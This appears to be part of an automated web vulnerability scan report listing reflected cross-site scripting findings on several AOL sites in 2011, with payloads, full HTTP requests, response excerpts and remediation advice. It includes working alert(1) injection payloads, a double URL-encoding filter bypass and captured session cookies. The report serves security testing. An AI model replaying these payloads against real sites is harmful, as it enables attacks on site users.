5.127. http://mobile.aol.com/product/iPhone/mail/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mobile.aol.com
Path:	/product/iPhone/mail/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25ae3%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6282df73d3 was submitted in the REST URL parameter 2. This input was echoed as 25ae3</script><script>alert(1)</script>6282df73d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone25ae3%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6282df73d3/mail/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617134192-Repeat%7C1367689134192%3B%20s_nrgvo%3DRepeat%7C1367689134194%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:11 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:11 GMT; path=/
Content-Type: text/html
Content-Length: 23687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
xID="mbd";
   s_265.pageName="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone25ae3</script><script>alert(1)</script>6282df73d3";
   s_265.prop2="mail";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script');

...[SNIP]...

5.128. http://mobile.aol.com/product/iPhone/mail/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mobile.aol.com
Path:	/product/iPhone/mail/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef64a%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e43a16951421 was submitted in the REST URL parameter 2. This input was echoed as ef64a</script><script>alert(1)</script>43a16951421 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhoneef64a%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e43a16951421/mail/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617134192-Repeat%7C1367689134192%3B%20s_nrgvo%3DRepeat%7C1367689134194%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:27 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:27 GMT; path=/
Content-Type: text/html
Content-Length: 23690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
<!--
adSetAdURL('http://mobile.aol.com/_uac/adpage.html');

/* Array declared for highlighting the gh_Navigation */
var _selected_prod_cat = 'iPhoneef64a</script><script>alert(1)</script>43a16951421';
if(_selected_prod_cat!=""){ _selected_prod_cat = _selected_prod_cat.toLowerCase(); }
var navArray = new Array();
navArray['iphone'] = 1;
navArray['android'] = 2;
navArray['blackberry']= 3
...[SNIP]...

5.129. http://mobile.aol.com/product/iPhone/mail/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mobile.aol.com
Path:	/product/iPhone/mail/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cb1a%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb4f4a6fa5a9 was submitted in the REST URL parameter 3. This input was echoed as 4cb1a</script><script>alert(1)</script>b4f4a6fa5a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone/mail4cb1a%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb4f4a6fa5a9/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617134192-Repeat%7C1367689134192%3B%20s_nrgvo%3DRepeat%7C1367689134194%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:51 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:51 GMT; path=/
Content-Type: text/html
Content-Length: 23643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
eName="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone";
   s_265.prop2="mail4cb1a</script><script>alert(1)</script>b4f4a6fa5a9";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script');
   s.type = 'text/javasc
...[SNIP]...

5.130. http://mobile.aol.com/product/iPhone/search/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mobile.aol.com
Path:	/product/iPhone/search/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1571e%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6ee6dc251a was submitted in the REST URL parameter 2. This input was echoed as 1571e</script><script>alert(1)</script>6ee6dc251a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone1571e%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6ee6dc251a/search/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617152782-Repeat%7C1367689152782%3B%20s_nrgvo%3DRepeat%7C1367689152783%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:22 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:22 GMT; path=/
Content-Type: text/html
Content-Length: 23694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
xID="mbd";
   s_265.pageName="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone1571e</script><script>alert(1)</script>6ee6dc251a";
   s_265.prop2="search";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script');
...[SNIP]...

5.131. http://mobile.aol.com/product/iPhone/search/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mobile.aol.com
Path:	/product/iPhone/search/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3753a%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c48f9faa85 was submitted in the REST URL parameter 2. This input was echoed as 3753a</script><script>alert(1)</script>3c48f9faa85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone3753a%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c48f9faa85/search/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617152782-Repeat%7C1367689152782%3B%20s_nrgvo%3DRepeat%7C1367689152783%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:38 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:38 GMT; path=/
Content-Type: text/html
Content-Length: 23698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
<!--
adSetAdURL('http://mobile.aol.com/_uac/adpage.html');

/* Array declared for highlighting the gh_Navigation */
var _selected_prod_cat = 'iPhone3753a</script><script>alert(1)</script>3c48f9faa85';
if(_selected_prod_cat!=""){ _selected_prod_cat = _selected_prod_cat.toLowerCase(); }
var navArray = new Array();
navArray['iphone'] = 1;
navArray['android'] = 2;
navArray['blackberry']= 3
...[SNIP]...

5.132. http://mobile.aol.com/product/iPhone/search/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mobile.aol.com
Path:	/product/iPhone/search/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91c42%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c8a5ad593 was submitted in the REST URL parameter 3. This input was echoed as 91c42</script><script>alert(1)</script>7c8a5ad593 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone/search91c42%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c8a5ad593/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617152782-Repeat%7C1367689152782%3B%20s_nrgvo%3DRepeat%7C1367689152783%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:42:03 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:42:03 GMT; path=/
Content-Type: text/html
Content-Length: 23646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
ame="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone";
   s_265.prop2="search91c42</script><script>alert(1)</script>7c8a5ad593";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script');
   s.type = 'text/javasc
...[SNIP]...

5.133. http://music.aol.com/radioguide/bb [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://music.aol.com
Path:	/radioguide/bb

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6292b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0d1b7f478ce was submitted in the REST URL parameter 2. This input was echoed as 6292b</script><script>alert(1)</script>0d1b7f478ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /radioguide/bb6292b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0d1b7f478ce HTTP/1.1
Host: music.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1304575004712-Repeat%7C1367647004712%3B%20s_nrgvo%3DRepeat%7C1367647004714%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:05 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:05 GMT; path=/
Content-Type: text/html
Content-Length: 36004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


...[SNIP]...
<script>
           function runOmni()
           {

               var genre = "bb6292b</script><script>alert(1)</script>0d1b7f478ce";

               s_265.channel="us.radiogde";


               s_265.pfxID="mus";
               s_265.pageName="Genre | "+genre+" Main";
               s_265.server="";

               s_265.pageType="";
               s_265.linkInternalF
...[SNIP]...

5.134. http://music.aol.com/radioguide/bb [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://music.aol.com
Path:	/radioguide/bb

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd150"><img%20src%3da%20onerror%3dalert(1)>48bbe472fcd was submitted in the REST URL parameter 2. This input was echoed as bd150"><img src=a onerror=alert(1)>48bbe472fcd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /radioguide/bbbd150"><img%20src%3da%20onerror%3dalert(1)>48bbe472fcd HTTP/1.1
Host: music.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1304575004712-Repeat%7C1367647004712%3B%20s_nrgvo%3DRepeat%7C1367647004714%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:58 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:56:58 GMT; path=/
Content-Type: text/html
Content-Length: 35942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


...[SNIP]...
<link rel="canonical" href="http://music.aol.com/radioguide/bbbd150"><img src=a onerror=alert(1)>48bbe472fcd">
...[SNIP]...

5.135. http://my.screenname.aol.com/_cqr/login/checkStatus.psp [cb parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://my.screenname.aol.com
Path:	/_cqr/login/checkStatus.psp

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 5b302<a%20b%3dc>7fe70a0ec3a was submitted in the cb parameter. This input was echoed as 5b302<a b=c>7fe70a0ec3a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /_cqr/login/checkStatus.psp?cb=parseCheckStatus5b302<a%20b%3dc>7fe70a0ec3a HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:04:23 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_LDC=1&-&-&1304557177&2&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:04:23 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 48
Keep-Alive: timeout=15, max=227
Connection: Keep-Alive

parseCheckStatus5b302<a b=c>7fe70a0ec3a(0);

5.136. https://my.screenname.aol.com/_cqr/login/login.psp [authLev parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://my.screenname.aol.com
Path:	/_cqr/login/login.psp

Issue detail

The value of the authLev request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3662</script><a>cffa8bfca76 was submitted in the authLev parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /_cqr/login/login.psp?sitedomain=startpage.aol.com&authLev=0f3662</script><a>cffa8bfca76&siteState=OrigUrl%3Dhttp%3A%2F%2Fwww.aol.com%2F&lang=en&locale=us&createSn=1 HTTP/1.1
Host: my.screenname.aol.com
Connection: keep-alive
Referer: https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=startpage.aol.com&siteState=OrigUrl%3dhttp%3a%2f%2fwww.aol.com%2f&authLev=0&lang=en&locale=us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: testcookie; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_SC=diAxLjAga2lkIDEgQVlTMUJ3VzRNZVAvUnNIclJpZGl1S2IyMDNRPQ%3D%3D-MwhW4P6%2F0%2BL6ODvOihE4Mz%2FdnNYp0U4IDrCoX8LRSmDq0RMdiaUfPoUocN3CCrqVyiLrMD9EZhdvRq7giYxAlyOjHinOlhTZ6rnw%2BAhDlDrmgnRttTTWUItbi21OuHY5; SNS_LDC=1&-&-&1304557177&1&1304557177&0

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:01:25 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
